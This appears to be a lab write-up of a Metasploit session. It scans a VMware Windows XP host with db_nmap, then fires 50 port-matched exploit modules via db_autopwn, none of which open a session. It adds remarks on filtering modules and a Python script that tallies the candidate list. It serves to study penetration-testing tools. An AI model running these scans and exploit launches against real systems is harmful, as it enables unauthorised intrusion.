Metasploit db_autopwn in practice

msf > db_nmap -O 192.168.1.142
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT
[*] Nmap: Nmap scan report for 192.168.1.142
[*] Nmap: Host is up (0.00047s latency).
[*] Nmap: Not shown: 997 filtered ports
[*] Nmap: PORT     STATE  SERVICE
[*] Nmap: 139/tcp  open   netbios-ssn
[*] Nmap: 445/tcp  open   microsoft-ds
[*] Nmap: 2869/tcp closed icslap
[*] Nmap: MAC Address: 00:0C:29:F1:31:D2 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (99%)
[*] Nmap: Aggressive OS guesses: Microsoft Windows XP SP3 (99%), Microsoft Windows XP (97%), Microsoft Windows Server 2003 SP1 or SP2 (97%), Microsoft Windows Server 2003 SP2 (97%), Microsoft Windows 2000 SP4 (95%), Microsoft Windows XP SP2 (95%), Microsoft Windows XP SP2 or SP3 (95%), Microsoft Windows Small Business Server 2003 (95%), Microsoft Windows XP Professional SP2 (95%), Microsoft Windows 2000 SP0 (95%)
[*] Nmap: No exact OS matches for host (test conditions non-ideal).
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 9.48 seconds
msf > hosts

Hosts
=====

address        mac                name  os_name            os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------            ---------  -----  -------  ----  --------
192.168.1.142  00:0C:29:F1:31:D2        Microsoft Windows  XP                device         

msf > db_autopwn -p -t -e
[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*] 
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.1.142:139  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/nttrans  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:139  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.1.142:139  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:139  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.1.142:139  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*]   192.168.1.142:445  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/multi/samba/nttrans  (port match)
[*]   192.168.1.142:445  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:445  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.1.142:445  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:445  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.1.142:445  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*] ================================================================================
[*] 
[*] 
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:139...
[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:139...
[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:139...
[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:139...
[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:139...
[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:139...
[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:139...
[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:139...
[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:139...
[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:139...
[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:139...
[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:139...
[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:139...
[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:139...
[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:139...
[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:139...
[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:139...
[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:445...
[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:445...
[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:445...
[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:445...
[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:445...
[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:445...
[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:445...
[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:445...
[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:445...
[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:445...
[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:445...
[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:445...
[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:445...
[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:445...
[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:445...
[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:445...
[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:445...
[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:445...
[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:445...
[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:445...
[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:445...
[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:445...
[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:445...
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:445...
[*] (50/50 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions

msf > 


The target is XP SP3. Running ms08_067_netapi on its own exploits it successfully, but the automated run does not.

Modules should be filtered before running db_autopwn.
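To see how loosely the `(port match)` selection fits the host that `hosts` reports as Microsoft Windows XP, the candidate list can be tallied by platform. The script below is an added example, not part of the original post; it assumes the first path component after `exploit/` names the module's platform, as the paths in the log suggest, and runs on a constructed subset of the lines above.

```python
import re
from collections import Counter

# Constructed sample: a few "Matching Exploit Modules" lines copied from the
# session above, plus one "Launching" line that must be ignored.
SAMPLE = """\
[*]   192.168.1.142:139  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/psexec  (port match)
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:139...
"""

# host:port, module path, and the reason db_autopwn gave for the match.
MATCH_RE = re.compile(
    r"^\[\*\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"exploit/(?P<platform>[^/\s]+)/(?P<rest>\S+)\s+\((?P<reason>[^)]+)\)\s*$"
)

def parse_matches(text):
    """Return one dict per candidate line; progress and banner lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = MATCH_RE.match(line)
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            rows.append(row)
    return rows

def summarize(rows, host_platform):
    """Bucket candidates: same platform as the host, cross-platform, or another OS."""
    buckets = Counter()
    for row in rows:
        if row["platform"] == host_platform:
            buckets["same"] += 1
        elif row["platform"] == "multi":  # assumption: 'multi' means cross-platform
            buckets["multi"] += 1
        else:
            buckets["other"] += 1
    return buckets

if __name__ == "__main__":
    print(dict(summarize(parse_matches(SAMPLE), "windows")))
```

Even the same-platform bucket is only a port-level guess: the `windows/brightstor` entries in the full log were selected without any evidence that the product is installed on the host.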
